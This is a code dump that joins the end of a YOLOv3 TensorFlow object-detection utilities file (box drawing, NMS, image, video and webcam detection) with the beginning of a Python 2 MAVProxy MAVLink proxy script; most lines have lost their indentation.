gt_boxes[:, [1, 3]] = gt_boxes[:, [1, 3]] * scale + dh
return image_paded, gt_boxes
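# Illustrative sketch (not part of the original file): the letterbox math in
# image_preprocess() above for a hypothetical 1280x720 frame and a 416x416
# input: scale = min(416/1280, 416/720) = 0.325, so the frame is resized to
# 416x234 and centred on the gray canvas with 91-pixel borders top and bottom.
def _letterbox_demo():
    import numpy as np
    frame = np.zeros((720, 1280, 3), dtype=np.uint8)
    padded = image_preprocess(frame, (416, 416))
    print(padded.shape)  # -> (416, 416, 3), values scaled into [0, 1]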
def draw_bbox(image, bboxes, CLASSES=YOLO_COCO_CLASSES, show_label=True, show_confidence = True, Text_colors=(255,255,0), rectangle_colors='', tracking=False):
NUM_CLASS = read_class_names(CLASSES)
num_classes = len(NUM_CLASS)
image_h, image_w, _ = image.shape
hsv_tuples = [(1.0 * x / num_classes, 1., 1.) for x in range(num_classes)]
#print("hsv_tuples", hsv_tuples)
colors = list(map(lambda x: colorsys.hsv_to_rgb(*x), hsv_tuples))
colors = list(map(lambda x: (int(x[0] * 255), int(x[1] * 255), int(x[2] * 255)), colors))
random.seed(0)
random.shuffle(colors)
random.seed(None)
for i, bbox in enumerate(bboxes):
coor = np.array(bbox[:4], dtype=np.int32)
score = bbox[4]
class_ind = int(bbox[5])
bbox_color = rectangle_colors if rectangle_colors != '' else colors[class_ind]
bbox_thick = int(0.6 * (image_h + image_w) / 1000)
if bbox_thick < 1: bbox_thick = 1
fontScale = 0.75 * bbox_thick
(x1, y1), (x2, y2) = (coor[0], coor[1]), (coor[2], coor[3])
# put object rectangle
cv2.rectangle(image, (x1, y1), (x2, y2), bbox_color, bbox_thick*2)
if show_label:
# get text label
score_str = " {:.2f}".format(score) if show_confidence else ""
if tracking: score_str = " "+str(score)
try:
label = "{}".format(NUM_CLASS[class_ind]) + score_str
except KeyError:
print("You received KeyError, this might be that you are trying to use yolo original weights")
print("while using custom classes, if using custom model in configs.py set YOLO_CUSTOM_WEIGHTS = True")
# get text size
(text_width, text_height), baseline = cv2.getTextSize(label, cv2.FONT_HERSHEY_COMPLEX_SMALL,
fontScale, thickness=bbox_thick)
# put filled text rectangle
cv2.rectangle(image, (x1, y1), (x1 + text_width, y1 - text_height - baseline), bbox_color, thickness=cv2.FILLED)
# put text above rectangle
cv2.putText(image, label, (x1, y1-4), cv2.FONT_HERSHEY_COMPLEX_SMALL,
fontScale, Text_colors, bbox_thick, lineType=cv2.LINE_AA)
return image
def bboxes_iou(boxes1, boxes2):
boxes1 = np.array(boxes1)
boxes2 = np.array(boxes2)
boxes1_area = (boxes1[..., 2] - boxes1[..., 0]) * (boxes1[..., 3] - boxes1[..., 1])
boxes2_area = (boxes2[..., 2] - boxes2[..., 0]) * (boxes2[..., 3] - boxes2[..., 1])
left_up = np.maximum(boxes1[..., :2], boxes2[..., :2])
right_down = np.minimum(boxes1[..., 2:], boxes2[..., 2:])
inter_section = np.maximum(right_down - left_up, 0.0)
inter_area = inter_section[..., 0] * inter_section[..., 1]
union_area = boxes1_area + boxes2_area - inter_area
ious = np.maximum(1.0 * inter_area / union_area, np.finfo(np.float32).eps)
return ious
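# Worked example (illustrative values): boxes [0,0,10,10] and [5,5,15,15] overlap
# in a 5x5 square, so IoU = 25 / (100 + 100 - 25) = 25/175, roughly 0.143.
def _demo_bboxes_iou():
    box_a = np.array([[0, 0, 10, 10]], dtype=np.float32)
    box_b = np.array([[5, 5, 15, 15]], dtype=np.float32)
    print(bboxes_iou(box_a, box_b))  # ~[0.1428]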
def nms(bboxes, iou_threshold, sigma=0.3, method='nms'):
"""
:param bboxes: (xmin, ymin, xmax, ymax, score, class)
Note: soft-nms, https://arxiv.org/pdf/1704.04503.pdf
https://github.com/bharatsingh430/soft-nms
"""
classes_in_img = list(set(bboxes[:, 5]))
best_bboxes = []
for cls in classes_in_img:
cls_mask = (bboxes[:, 5] == cls)
cls_bboxes = bboxes[cls_mask]
# Process 1: loop while any bounding boxes remain for this class
while len(cls_bboxes) > 0:
# Process 2: select the bounding box with the highest score (call it box A)
max_ind = np.argmax(cls_bboxes[:, 4])
best_bbox = cls_bboxes[max_ind]
best_bboxes.append(best_bbox)
cls_bboxes = np.concatenate([cls_bboxes[: max_ind], cls_bboxes[max_ind + 1:]])
# Process 3: compute the IoU between box A and the remaining boxes, then
# suppress (or, for soft-NMS, down-weight) boxes whose IoU exceeds the threshold
iou = bboxes_iou(best_bbox[np.newaxis, :4], cls_bboxes[:, :4])
weight = np.ones((len(iou),), dtype=np.float32)
assert method in ['nms', 'soft-nms']
if method == 'nms':
iou_mask = iou > iou_threshold
weight[iou_mask] = 0.0
if method == 'soft-nms':
weight = np.exp(-(1.0 * iou ** 2 / sigma))
cls_bboxes[:, 4] = cls_bboxes[:, 4] * weight
score_mask = cls_bboxes[:, 4] > 0.
cls_bboxes = cls_bboxes[score_mask]
return best_bboxes
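# Minimal sketch (illustrative values): two heavily overlapping detections of the
# same class; hard NMS keeps only the higher-scoring one.
def _demo_nms():
    dets = np.array([[0, 0, 10, 10, 0.9, 0],
                     [1, 1, 11, 11, 0.8, 0]], dtype=np.float32)
    kept = nms(dets, iou_threshold=0.5, method='nms')
    print(len(kept))  # 1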
def postprocess_boxes(pred_bbox, original_image, input_size, score_threshold):
valid_scale=[0, np.inf]
pred_bbox = np.array(pred_bbox)
pred_xywh = pred_bbox[:, 0:4]
pred_conf = pred_bbox[:, 4]
pred_prob = pred_bbox[:, 5:]
# 1. (x, y, w, h) --> (xmin, ymin, xmax, ymax)
pred_coor = np.concatenate([pred_xywh[:, :2] - pred_xywh[:, 2:] * 0.5,
pred_xywh[:, :2] + pred_xywh[:, 2:] * 0.5], axis=-1)
# 2. (xmin, ymin, xmax, ymax) -> (xmin_org, ymin_org, xmax_org, ymax_org)
org_h, org_w = original_image.shape[:2]
resize_ratio = min(input_size / org_w, input_size / org_h)
dw = (input_size - resize_ratio * org_w) / 2
dh = (input_size - resize_ratio * org_h) / 2
pred_coor[:, 0::2] = 1.0 * (pred_coor[:, 0::2] - dw) / resize_ratio
pred_coor[:, 1::2] = 1.0 * (pred_coor[:, 1::2] - dh) / resize_ratio
# 3. clip some boxes those are out of range
pred_coor = np.concatenate([np.maximum(pred_coor[:, :2], [0, 0]),
np.minimum(pred_coor[:, 2:], [org_w - 1, org_h - 1])], axis=-1)
invalid_mask = np.logical_or((pred_coor[:, 0] > pred_coor[:, 2]), (pred_coor[:, 1] > pred_coor[:, 3]))
pred_coor[invalid_mask] = 0
# 4. discard some invalid boxes
bboxes_scale = np.sqrt(np.multiply.reduce(pred_coor[:, 2:4] - pred_coor[:, 0:2], axis=-1))
scale_mask = np.logical_and((valid_scale[0] < bboxes_scale), (bboxes_scale < valid_scale[1]))
# 5. discard boxes with low scores
classes = np.argmax(pred_prob, axis=-1)
scores = pred_conf * pred_prob[np.arange(len(pred_coor)), classes]
score_mask = scores > score_threshold
mask = np.logical_and(scale_mask, score_mask)
coors, scores, classes = pred_coor[mask], scores[mask], classes[mask]
return np.concatenate([coors, scores[:, np.newaxis], classes[:, np.newaxis]], axis=-1)
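# Illustrative sketch (fabricated prediction, not from the original file):
# postprocess_boxes undoes the letterboxing from image_preprocess, mapping
# network-space (x, y, w, h) predictions back to pixel coordinates, then filters
# by score. With a 416x416 original image the mapping is the identity.
def _demo_postprocess_boxes():
    # one fake prediction: centered 100x100 box, confidence 0.9, one class with prob 1.0
    pred = np.array([[208.0, 208.0, 100.0, 100.0, 0.9, 1.0]], dtype=np.float32)
    original = np.zeros((416, 416, 3), dtype=np.uint8)
    print(postprocess_boxes(pred, original, 416, 0.3))  # [[158. 158. 258. 258. 0.9 0.]]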
def detect_image(Yolo, image_path, output_path, input_size=416, show=False, CLASSES=YOLO_COCO_CLASSES, score_threshold=0.3, iou_threshold=0.45, rectangle_colors=''):
original_image = cv2.imread(image_path)
original_image = cv2.cvtColor(original_image, cv2.COLOR_BGR2RGB) # the model expects RGB input
image_data = image_preprocess(np.copy(original_image), [input_size, input_size])
image_data = image_data[np.newaxis, ...].astype(np.float32)
if YOLO_FRAMEWORK == "tf":
pred_bbox = Yolo.predict(image_data)
elif YOLO_FRAMEWORK == "trt":
batched_input = tf.constant(image_data)
result = Yolo(batched_input)
pred_bbox = []
for key, value in result.items():
value = value.numpy()
pred_bbox.append(value)
pred_bbox = [tf.reshape(x, (-1, tf.shape(x)[-1])) for x in pred_bbox]
pred_bbox = tf.concat(pred_bbox, axis=0)
bboxes = postprocess_boxes(pred_bbox, original_image, input_size, score_threshold)
bboxes = nms(bboxes, iou_threshold, method='nms')
image = draw_bbox(original_image, bboxes, CLASSES=CLASSES, rectangle_colors=rectangle_colors)
# CreateXMLfile("XML_Detections", str(int(time.time())), original_image, bboxes, read_class_names(CLASSES))
image = cv2.cvtColor(image, cv2.COLOR_RGB2BGR) # back to BGR for OpenCV writing and display
if output_path != '': cv2.imwrite(output_path, image)
if show:
cv2.imshow("predicted image", image)
# wait for any key press, then close the window
cv2.waitKey(0)
cv2.destroyAllWindows()
return image
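# Usage sketch (file paths are placeholders, not from the original file): build the
# model once with Load_Yolo_model() above, then run single-image detection.
def _demo_detect_image():
    yolo = Load_Yolo_model()
    detect_image(yolo, "input.jpg", "detected.jpg", input_size=YOLO_INPUT_SIZE, show=False)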
def Predict_bbox_mp(Frames_data, Predicted_data, Processing_times):
gpus = tf.config.experimental.list_physical_devices('GPU')
if len(gpus) > 0:
try: tf.config.experimental.set_memory_growth(gpus[0], True)
except RuntimeError: print("RuntimeError in tf.config.experimental.set_memory_growth")
Yolo = Load_Yolo_model()
times = []
while True:
if Frames_data.qsize()>0:
image_data = Frames_data.get()
t1 = time.time()
Processing_times.put(time.time())
if YOLO_FRAMEWORK == "tf":
pred_bbox = Yolo.predict(image_data)
elif YOLO_FRAMEWORK == "trt":
batched_input = tf.constant(image_data)
result = Yolo(batched_input)
pred_bbox = []
for key, value in result.items():
value = value.numpy()
pred_bbox.append(value)
pred_bbox = [tf.reshape(x, (-1, tf.shape(x)[-1])) for x in pred_bbox]
pred_bbox = tf.concat(pred_bbox, axis=0)
Predicted_data.put(pred_bbox)
def postprocess_mp(Predicted_data, original_frames, Processed_frames, Processing_times, input_size, CLASSES, score_threshold, iou_threshold, rectangle_colors, realtime):
times = []
while True:
if Predicted_data.qsize()>0:
pred_bbox = Predicted_data.get()
if realtime:
while original_frames.qsize() > 1:
original_image = original_frames.get()
else:
original_image = original_frames.get()
bboxes = postprocess_boxes(pred_bbox, original_image, input_size, score_threshold)
bboxes = nms(bboxes, iou_threshold, method='nms')
image = draw_bbox(original_image, bboxes, CLASSES=CLASSES, rectangle_colors=rectangle_colors)
image = cv2.cvtColor(image, cv2.COLOR_RGB2BGR) # back to BGR for display and video writing
times.append(time.time()-Processing_times.get())
times = times[-20:]
ms = sum(times)/len(times)*1000
fps = 1000 / ms
image = cv2.putText(image, "Time: {:.1f}FPS".format(fps), (0, 30), cv2.FONT_HERSHEY_COMPLEX_SMALL, 1, (0, 0, 255), 2)
#print("Time: {:.2f}ms, Final FPS: {:.1f}".format(ms, fps))
Processed_frames.put(image)
def Show_Image_mp(Processed_frames, show, Final_frames):
while True:
if Processed_frames.qsize()>0:
image = Processed_frames.get()
Final_frames.put(image)
if show:
cv2.imshow('output', image)
if cv2.waitKey(25) & 0xFF == ord("q"):
cv2.destroyAllWindows()
break
# detect from webcam
def detect_video_realtime_mp(video_path, output_path, input_size=416, show=False, CLASSES=YOLO_COCO_CLASSES, score_threshold=0.3, iou_threshold=0.45, rectangle_colors='', realtime=False):
if realtime:
vid = cv2.VideoCapture(0)
else:
vid = cv2.VideoCapture(video_path)
# by default VideoCapture returns float instead of int
width = int(vid.get(cv2.CAP_PROP_FRAME_WIDTH))
height = int(vid.get(cv2.CAP_PROP_FRAME_HEIGHT))
fps = int(vid.get(cv2.CAP_PROP_FPS))
codec = cv2.VideoWriter_fourcc(*'XVID')
out = cv2.VideoWriter(output_path, codec, fps, (width, height)) # writer for the annotated output video (XVID fourcc)
no_of_frames = int(vid.get(cv2.CAP_PROP_FRAME_COUNT))
original_frames = Queue()
Frames_data = Queue()
Predicted_data = Queue()
Processed_frames = Queue()
Processing_times = Queue()
Final_frames = Queue()
p1 = Process(target=Predict_bbox_mp, args=(Frames_data, Predicted_data, Processing_times))
p2 = Process(target=postprocess_mp, args=(Predicted_data, original_frames, Processed_frames, Processing_times, input_size, CLASSES, score_threshold, iou_threshold, rectangle_colors, realtime))
p3 = Process(target=Show_Image_mp, args=(Processed_frames, show, Final_frames))
p1.start()
p2.start()
p3.start()
while True:
ret, img = vid.read()
if not ret:
break
original_image = cv2.cvtColor(img, cv2.COLOR_BGR2RGB) # the model expects RGB input
original_frames.put(original_image)
image_data = image_preprocess(np.copy(original_image), [input_size, input_size])
image_data = image_data[np.newaxis, ...].astype(np.float32)
Frames_data.put(image_data)
while True:
if original_frames.qsize() == 0 and Frames_data.qsize() == 0 and Predicted_data.qsize() == 0 and Processed_frames.qsize() == 0 and Processing_times.qsize() == 0 and Final_frames.qsize() == 0:
p1.terminate()
p2.terminate()
p3.terminate()
break
elif Final_frames.qsize()>0:
image = Final_frames.get()
if output_path != '': out.write(image)
cv2.destroyAllWindows()
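# Usage sketch (paths are placeholders): with realtime=True the pipeline reads the
# default webcam and drops stale frames; with realtime=False it processes a file
# end to end across the three worker processes started above.
def _demo_detect_video_realtime_mp():
    detect_video_realtime_mp("input.mp4", "detected.avi", input_size=YOLO_INPUT_SIZE, show=True, realtime=False)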
def detect_video(Yolo, video_path, output_path, input_size=416, show=False, CLASSES=YOLO_COCO_CLASSES, score_threshold=0.3, iou_threshold=0.45, rectangle_colors=''):
times, times_2 = [], []
vid = cv2.VideoCapture(video_path)
# by default VideoCapture returns float instead of int
width = int(vid.get(cv2.CAP_PROP_FRAME_WIDTH))
height = int(vid.get(cv2.CAP_PROP_FRAME_HEIGHT))
fps = int(vid.get(cv2.CAP_PROP_FPS))
codec = cv2.VideoWriter_fourcc(*'XVID')
out = cv2.VideoWriter(output_path, codec, fps, (width, height)) # writer for the annotated output video (XVID fourcc)
while True:
ret, img = vid.read()
if not ret:
break
original_image = cv2.cvtColor(img, cv2.COLOR_BGR2RGB) # the model expects RGB input
image_data = image_preprocess(np.copy(original_image), [input_size, input_size])
image_data = image_data[np.newaxis, ...].astype(np.float32)
t1 = time.time()
if YOLO_FRAMEWORK == "tf":
pred_bbox = Yolo.predict(image_data)
elif YOLO_FRAMEWORK == "trt":
batched_input = tf.constant(image_data)
result = Yolo(batched_input)
pred_bbox = []
for key, value in result.items():
value = value.numpy()
pred_bbox.append(value)
t2 = time.time()
pred_bbox = [tf.reshape(x, (-1, tf.shape(x)[-1])) for x in pred_bbox]
pred_bbox = tf.concat(pred_bbox, axis=0)
bboxes = postprocess_boxes(pred_bbox, original_image, input_size, score_threshold)
bboxes = nms(bboxes, iou_threshold, method='nms')
image = draw_bbox(original_image, bboxes, CLASSES=CLASSES, rectangle_colors=rectangle_colors)
image = cv2.cvtColor(image, cv2.COLOR_RGB2BGR) # back to BGR for display and video writing
t3 = time.time()
times.append(t2-t1)
times_2.append(t3-t1)
times = times[-20:]
times_2 = times_2[-20:]
ms = sum(times)/len(times)*1000
fps = 1000 / ms
fps2 = 1000 / (sum(times_2)/len(times_2)*1000)
image = cv2.putText(image, "Time: {:.1f}FPS".format(fps), (0, 30), cv2.FONT_HERSHEY_COMPLEX_SMALL, 1, (0, 0, 255), 2)
# CreateXMLfile("XML_Detections", str(int(time.time())), original_image, bboxes, read_class_names(CLASSES))
print("Time: {:.2f}ms, Detection FPS: {:.1f}, total FPS: {:.1f}".format(ms, fps, fps2))
if output_path != '': out.write(image)
if show:
cv2.imshow('output', image)
if cv2.waitKey(25) & 0xFF == ord("q"):
cv2.destroyAllWindows()
break
cv2.destroyAllWindows()
# detect from webcam
def detect_realtime(Yolo, output_path, input_size=416, show=False, CLASSES=YOLO_COCO_CLASSES, score_threshold=0.3, iou_threshold=0.45, rectangle_colors=''):
times = []
vid = cv2.VideoCapture(0)
# by default VideoCapture returns float instead of int
width = int(vid.get(cv2.CAP_PROP_FRAME_WIDTH))
height = int(vid.get(cv2.CAP_PROP_FRAME_HEIGHT))
fps = int(vid.get(cv2.CAP_PROP_FPS))
codec = cv2.VideoWriter_fourcc(*'XVID')
out = cv2.VideoWriter(output_path, codec, fps, (width, height)) # writer for the annotated output video (XVID fourcc)
while True:
ret, frame = vid.read()
if not ret:
break
original_frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB) # the model expects RGB input
image_data = image_preprocess(np.copy(original_frame), [input_size, input_size])
image_data = image_data[np.newaxis, ...].astype(np.float32)
t1 = time.time()
if YOLO_FRAMEWORK == "tf":
pred_bbox = Yolo.predict(image_data)
elif YOLO_FRAMEWORK == "trt":
batched_input = tf.constant(image_data)
result = Yolo(batched_input)
pred_bbox = []
for key, value in result.items():
value = value.numpy()
pred_bbox.append(value)
t2 = time.time()
pred_bbox = [tf.reshape(x, (-1, tf.shape(x)[-1])) for x in pred_bbox]
pred_bbox = tf.concat(pred_bbox, axis=0)
bboxes = postprocess_boxes(pred_bbox, original_frame, input_size, score_threshold)
bboxes = nms(bboxes, iou_threshold, method='nms')
times.append(t2-t1)
times = times[-20:]
ms = sum(times)/len(times)*1000
fps = 1000 / ms
print("Time: {:.2f}ms, {:.1f} FPS".format(ms, fps))
frame = draw_bbox(original_frame, bboxes, CLASSES=CLASSES, rectangle_colors=rectangle_colors)
frame = cv2.cvtColor(frame, cv2.COLOR_RGB2BGR) # back to BGR for display and video writing
# CreateXMLfile("XML_Detections", str(int(time.time())), original_frame, bboxes, read_class_names(CLASSES))
image = cv2.putText(frame, "Time: {:.1f}FPS".format(fps), (0, 30),
cv2.FONT_HERSHEY_COMPLEX_SMALL, 1, (0, 0, 255), 2)
if output_path != '': out.write(frame)
if show:
cv2.imshow('output', frame)
if cv2.waitKey(25) & 0xFF == ord("q"):
cv2.destroyAllWindows()
break
cv2.destroyAllWindows()
|
mavproxy2.py | #!/usr/bin/env python
# -*- coding:utf-8 -*-
'''
mavproxy - a MAVLink proxy program
Copyright Andrew Tridgell 2011
Released under the GNU GPL version 3 or later
'''
import sys, os, time, socket, signal
reload(sys)
sys.setdefaultencoding('utf-8')
import fnmatch, errno, threading
import serial, Queue, select
import traceback
import shlex
import datetime
from MAVProxy.modules.lib import textconsole
from MAVProxy.modules.lib import rline
from MAVProxy.modules.lib import mp_module
from MAVProxy.modules.lib import dumpstacks
# adding all this allows pyinstaller to build a working windows executable
# note that using --hidden-import does not work for these modules
try:
from multiprocessing import freeze_support
from pymavlink import mavwp, mavutil
import matplotlib, HTMLParser
try:
import readline
except ImportError:
import pyreadline as readline
except Exception:
pass
if __name__ == '__main__':
freeze_support()
class MPStatus(object):
'''hold status information about the mavproxy'''
def __init__(self):
self.gps = None
self.msgs = {}
self.msg_count = {}
self.counters = {'MasterIn' : [], 'MasterOut' : 0, 'FGearIn' : 0, 'FGearOut' : 0, 'Slave' : 0}
self.setup_mode = opts.setup
self.mav_error = 0
self.altitude = 0
self.last_altitude_announce = 0.0
self.last_distance_announce = 0.0
self.exit = False
self.flightmode = 'MAV'
self.last_mode_announce = 0
self.logdir = None
self.last_heartbeat = 0
self.last_message = 0
self.heartbeat_error = False
self.last_apm_msg = None
self.last_apm_msg_time = 0
self.highest_msec = 0
self.have_gps_lock = False
self.lost_gps_lock = False
self.last_gps_lock = 0
self.watch = None
self.last_streamrate1 = -1
self.last_streamrate2 = -1
self.last_seq = 0
self.armed = False
def show(self, f, pattern=None):
'''write status to status.txt'''
if pattern is None:
f.write('Counters: ')
for c in self.counters:
f.write('%s:%s ' % (c, self.counters[c]))
f.write('\n')
f.write('MAV Errors: %u\n' % self.mav_error)
f.write(str(self.gps)+'\n')
for m in sorted(self.msgs.keys()):
#print m
if pattern is not None and not fnmatch.fnmatch(str(m).upper(), pattern.upper()):
continue
f.write("%u: %s\n" % (self.msg_count[m], str(self.msgs[m])))
def write(self):
'''write status to status.txt'''
f = open('status.txt', mode='w')
self.show(f)
f.close()
def say_text(text, priority='important'):
'''text output - default function for say()'''
mpstate.console.writeln(text)
def say(text, priority='important'):
'''text and/or speech output'''
mpstate.functions.say(text, priority)
def add_input(cmd, immediate=False):
'''add some command input to be processed'''
if immediate:
process_stdin(cmd)
else:
mpstate.input_queue.put(cmd)
class MAVFunctions(object):
'''core functions available in modules'''
def __init__(self):
self.process_stdin = add_input
self.param_set = param_set
self.get_mav_param = get_mav_param
self.say = say_text
# input handler can be overridden by a module
self.input_handler = None
class MPState(object):
'''holds state of mavproxy'''
def __init__(self):
self.bsp_dir = ""
self.bsp_name = ""
self.app_dir = ""
self.app_name = ""
self.ssid = ""
self.mac = ""
self.console = textconsole.SimpleConsole()
self.map = None
self.map_functions = {}
self.vehicle_type = None
self.vehicle_name = None
from MAVProxy.modules.lib.mp_settings import MPSettings, MPSetting
self.settings = MPSettings(
[ MPSetting('link', int, 1, 'Primary Link', tab='Link', range=(0,4), increment=1),
MPSetting('streamrate', int, 4, 'Stream rate link1', range=(-1,20), increment=1),
MPSetting('streamrate2', int, 4, 'Stream rate link2', range=(-1,20), increment=1),
MPSetting('heartbeat', int, 1, 'Heartbeat rate', range=(0,5), increment=1),
MPSetting('mavfwd', bool, True, 'Allow forwarded control'),
MPSetting('mavfwd_rate', bool, False, 'Allow forwarded rate control'),
MPSetting('shownoise', bool, True, 'Show non-MAVLink data'),
MPSetting('baudrate', int, opts.baudrate, 'baudrate for new links', range=(0,10000000), increment=1),
MPSetting('rtscts', bool, opts.rtscts, 'enable flow control'),
MPSetting('select_timeout', float, 0.01, 'select timeout'),
MPSetting('altreadout', int, 10, 'Altitude Readout',
range=(0,100), increment=1, tab='Announcements'),
MPSetting('distreadout', int, 200, 'Distance Readout', range=(0,10000), increment=1),
MPSetting('moddebug', int, opts.moddebug, 'Module Debug Level', range=(0,3), increment=1, tab='Debug'),
MPSetting('compdebug', int, 0, 'Computation Debug Mask', range=(0,3), tab='Debug'),
MPSetting('flushlogs', bool, False, 'Flush logs on every packet'),
MPSetting('requireexit', bool, False, 'Require exit command'),
MPSetting('wpupdates', bool, True, 'Announce waypoint updates'),
MPSetting('basealt', int, 0, 'Base Altitude', range=(0,30000), increment=1, tab='Altitude'),
MPSetting('wpalt', int, 100, 'Default WP Altitude', range=(0,10000), increment=1),
MPSetting('rallyalt', int, 90, 'Default Rally Altitude', range=(0,10000), increment=1),
MPSetting('terrainalt', str, 'Auto', 'Use terrain altitudes', choice=['Auto','True','False']),
MPSetting('rally_breakalt', int, 40, 'Default Rally Break Altitude', range=(0,10000), increment=1),
MPSetting('rally_flags', int, 0, 'Default Rally Flags', range=(0,10000), increment=1),
MPSetting('source_system', int, 255, 'MAVLink Source system', range=(0,255), increment=1, tab='MAVLink'),
MPSetting('source_component', int, 0, 'MAVLink Source component', range=(0,255), increment=1),
MPSetting('target_system', int, 0, 'MAVLink target system', range=(0,255), increment=1),
MPSetting('target_component', int, 0, 'MAVLink target component', range=(0,255), increment=1),
MPSetting('state_basedir', str, None, 'base directory for logs and aircraft directories'),
MPSetting('allow_unsigned', bool, True, 'whether unsigned packets will be accepted')
])
self.completions = {
"script" : ["(FILENAME)"],
"set" : ["(SETTING)"],
"status" : ["(VARIABLE)"],
"module" : ["list",
"load (AVAILMODULES)",
"<unload|reload> (LOADEDMODULES)"]
}
self.status = MPStatus()
# master mavlink device
self.mav_master = None
# mavlink outputs
self.mav_outputs = []
self.sysid_outputs = {}
# SITL output
self.sitl_output = None
self.mav_param = mavparm.MAVParmDict()
self.modules = []
self.public_modules = {}
self.functions = MAVFunctions()
self.select_extra = {}
self.continue_mode = False
self.aliases = {}
import platform
self.system = platform.system()
def module(self, name):
'''Find a public module (most modules are private)'''
if name in self.public_modules:
return self.public_modules[name]
return None
def master(self):
'''return the currently chosen mavlink master object'''
if len(self.mav_master) == 0:
return None
if self.settings.link > len(self.mav_master):
self.settings.link = 1
# try to use one with no link error
if not self.mav_master[self.settings.link-1].linkerror:
return self.mav_master[self.settings.link-1]
for m in self.mav_master:
if not m.linkerror:
return m
return self.mav_master[self.settings.link-1]
def get_mav_param(param, default=None):
'''return a EEPROM parameter value'''
return mpstate.mav_param.get(param, default)
def param_set(name, value, retries=3):
'''set a parameter'''
name = name.upper()
return mpstate.mav_param.mavset(mpstate.master(), name, value, retries=retries)
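# Hedged example (the parameter name is illustrative, not taken from this file):
# set an autopilot parameter over the current master link, retrying up to three times.
def _demo_param_set():
    param_set('RTL_ALT', 1500)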
def cmd_script(args):
'''run a script'''
if len(args) < 1:
print("usage: script <filename>")
return
run_script(args[0])
def cmd_set(args):
'''control mavproxy options'''
mpstate.settings.command(args)
def cmd_status(args):
'''show status'''
if len(args) == 0:
mpstate.status.show(sys.stdout, pattern=None)
else:
for pattern in args:
mpstate.status.show(sys.stdout, pattern=pattern)
def cmd_setup(args):
mpstate.status.setup_mode = True
mpstate.rl.set_prompt("")
def cmd_reset(args):
print("Resetting master")
mpstate.master().reset()
def cmd_watch(args):
'''watch a mavlink packet pattern'''
if len(args) == 0:
mpstate.status.watch = None
return
mpstate.status.watch = args[0]
print("Watching %s" % mpstate.status.watch)
def load_module(modname, quiet=False):
'''load a module'''
modpaths = ['MAVProxy.modules.mavproxy_%s' % modname, modname]
for (m,pm) in mpstate.modules:
if m.name == modname:
if not quiet:
print("module %s already loaded" % modname)
return False
for modpath in modpaths:
try:
m = import_package(modpath)
reload(m)
module = m.init(mpstate)
if isinstance(module, mp_module.MPModule):
mpstate.modules.append((module, m))
if not quiet:
print("Loaded module %s" % (modname,))
return True
else:
ex = "%s.init did not return a MPModule instance" % modname
break
except ImportError as msg:
ex = msg
if mpstate.settings.moddebug > 1:
import traceback
print(traceback.format_exc())
print("Failed to load module: %s. Use 'set moddebug 3' in the MAVProxy console to enable traceback" % ex)
return False
def unload_module(modname):
'''unload a module'''
for (m,pm) in mpstate.modules:
if m.name == modname:
if hasattr(m, 'unload'):
m.unload()
mpstate.modules.remove((m,pm))
print("Unloaded module %s" % modname)
return True
print("Unable to find module %s" % modname)
return False
def cmd_module(args):
'''module commands'''
usage = "usage: module <list|load|reload|unload>"
if len(args) < 1:
print(usage)
return
if args[0] == "list":
for (m,pm) in mpstate.modules:
print("%s: %s" % (m.name, m.description))
elif args[0] == "load":
if len(args) < 2:
print("usage: module load <name>")
return
load_module(args[1])
elif args[0] == "reload":
if len(args) < 2:
print("usage: module reload <name>")
return
modname = args[1]
pmodule = None
for (m,pm) in mpstate.modules:
if m.name == modname:
pmodule = pm
if pmodule is None:
print("Module %s not loaded" % modname)
return
if unload_module(modname):
import zipimport
try:
reload(pmodule)
except ImportError:
clear_zipimport_cache()
reload(pmodule)
if load_module(modname, quiet=True):
print("Reloaded module %s" % modname)
elif args[0] == "unload":
if len(args) < 2:
print("usage: module unload <name>")
return
modname = os.path.basename(args[1])
unload_module(modname)
else:
print(usage)
def cmd_alias(args):
'''alias commands'''
usage = "usage: alias <add|remove|list>"
if len(args) < 1 or args[0] == "list":
if len(args) >= 2:
wildcard = args[1].upper()
else:
wildcard = '*'
for a in sorted(mpstate.aliases.keys()):
if fnmatch.fnmatch(a.upper(), wildcard):
print("%-15s : %s" % (a, mpstate.aliases[a]))
elif args[0] == "add":
if len(args) < 3:
print(usage)
return
a = args[1]
mpstate.aliases[a] = ' '.join(args[2:])
elif args[0] == "remove":
if len(args) != 2:
print(usage)
return
a = args[1]
if a in mpstate.aliases:
mpstate.aliases.pop(a)
else:
print("no alias %s" % a)
else:
print(usage)
return
def clear_zipimport_cache():
"""Clear out cached entries from _zip_directory_cache.
See http://www.digi.com/wiki/developer/index.php/Error_messages"""
import sys, zipimport
syspath_backup = list(sys.path)
zipimport._zip_directory_cache.clear()
# load back items onto sys.path
sys.path = syspath_backup
# add this too: see https://mail.python.org/pipermail/python-list/2005-May/353229.html
sys.path_importer_cache.clear()
# http://stackoverflow.com/questions/211100/pythons-import-doesnt-work-as-expected
# has info on why this is necessary.
def import_package(name):
"""Given a package name like 'foo.bar.quux', imports the package
and returns the desired module."""
print "module:%s\n" % name
import zipimport
try:
mod = __import__(name)
except ImportError:
clear_zipimport_cache()
mod = __import__(name)
components = name.split('.')
for comp in components[1:]:
mod = getattr(mod, comp)
return mod
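# Hedged example of the helper above: unlike a bare __import__, import_package
# returns the leaf module of a dotted name ('os.path' is just a stdlib example).
def _demo_import_package():
    mod = import_package('os.path')
    print(mod.__name__)  # e.g. 'posixpath' on Linux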
command_map = {
'script' : (cmd_script, 'run a script of MAVProxy commands'),
'setup' : (cmd_setup, 'go into setup mode'),
'reset' : (cmd_reset, 'reopen the connection to the MAVLink master'),
'status' : (cmd_status, 'show status'),
'set' : (cmd_set, 'mavproxy settings'),
'watch' : (cmd_watch, 'watch a MAVLink pattern'),
'module' : (cmd_module, 'module commands'),
'alias' : (cmd_alias, 'command aliases')
}
def process_stdin(line):
'''handle commands from user'''
if line is None:
sys.exit(0)
# allow for modules to override input handling
if mpstate.functions.input_handler is not None:
mpstate.functions.input_handler(line)
return
line = line.strip()
if mpstate.status.setup_mode:
# in setup mode we send strings straight to the master
if line == '.':
mpstate.status.setup_mode = False
mpstate.status.flightmode = "MAV"
mpstate.rl.set_prompt("MAV> ")
return
if line != '+++':
line += '\r'
for c in line:
time.sleep(0.01)
mpstate.master().write(c)
return
if not line:
return
args = shlex.split(line)
cmd = args[0]
while cmd in mpstate.aliases:
line = mpstate.aliases[cmd]
args = shlex.split(line) + args[1:]
cmd = args[0]
if cmd == 'help':
k = sorted(command_map.keys())
for cmd in k:
(fn, help) = command_map[cmd]
print("%-15s : %s" % (cmd, help))
return
